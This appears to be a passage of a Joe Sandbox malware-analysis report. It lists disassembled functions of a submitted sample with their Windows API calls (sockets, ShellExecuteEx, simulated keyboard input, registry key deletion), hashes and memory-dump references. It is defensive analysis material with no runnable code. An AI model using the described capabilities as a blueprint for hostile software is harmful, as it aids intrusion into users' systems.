                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        • Opcode ID: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                                                                        • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                        • Opcode Fuzzy Hash: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                                                                        • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                        Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                        • GetDC.USER32(00000000), ref: 004861F3
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                        • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                        • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                        • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                        Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • _wcstok.LIBCMT ref: 0046EC94
                                                                                        • _wcscpy.LIBCMT ref: 0046ED23
                                                                                        • _memset.LIBCMT ref: 0046ED56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 61a62617d1352fa787127b2edd6e68edb46a35a4633b9ba517ff96d19aa606e4
                                                                                        • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                        • Opcode Fuzzy Hash: 61a62617d1352fa787127b2edd6e68edb46a35a4633b9ba517ff96d19aa606e4
                                                                                        • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                        Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                          • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                          • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                                        • _strlen.LIBCMT ref: 00476D44
                                                                                        • _memmove.LIBCMT ref: 00476DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        • Opcode ID: f5e363b101de90cb534bcd6cd3fb256a8fb7d6fb98fcc976db2ccb98a7b2995e
                                                                                        • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                                        • Opcode Fuzzy Hash: f5e363b101de90cb534bcd6cd3fb256a8fb7d6fb98fcc976db2ccb98a7b2995e
                                                                                        • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                                                        Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                        • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                        • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                        • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                        Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00CD3038), ref: 0048B3EB
                                                                                        • IsWindowEnabled.USER32(00CD3038), ref: 0048B3F7
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                        • SendMessageW.USER32(00CD3038,000000B0,?,?), ref: 0048B512
                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                        • GetWindowLongW.USER32(00CD3038,000000EC), ref: 0048B571
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID:
                                                                                        • API String ID: 4072528602-0
                                                                                        • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                        • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                        • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                        • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                        Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047F448
                                                                                        • _memset.LIBCMT ref: 0047F511
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                        • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                        • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                        • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                        Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00460F8C
                                                                                        • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                        • SetKeyboardState.USER32(?), ref: 00461002
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                        • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                        • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                        • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                                        Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00460DA5
                                                                                        • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                        • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                        • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                        • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                        • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                        Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                        • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                                        • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                        • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                                        Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: ,,I$DllGetClassObject
                                                                                        • API String ID: 753597075-1683996018
                                                                                        • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                        • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                                        • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                        • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                                        Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                                                                        • _wcscmp.LIBCMT ref: 004636D3
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                                                                        • _wcscat.LIBCMT ref: 00463733
                                                                                        • SHFileOperationW.SHELL32(?), ref: 0046379F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1377345388-1173974218
                                                                                        • Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                        • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                                                                        • Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                        • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                                                                        Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004872AA
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                        • IsMenu.USER32(?), ref: 00487369
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                        • DrawMenuBar.USER32 ref: 004873C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 3866635326-4108050209
                                                                                        • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                        • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                        • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                        • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                        Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                          • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                          • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                          • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
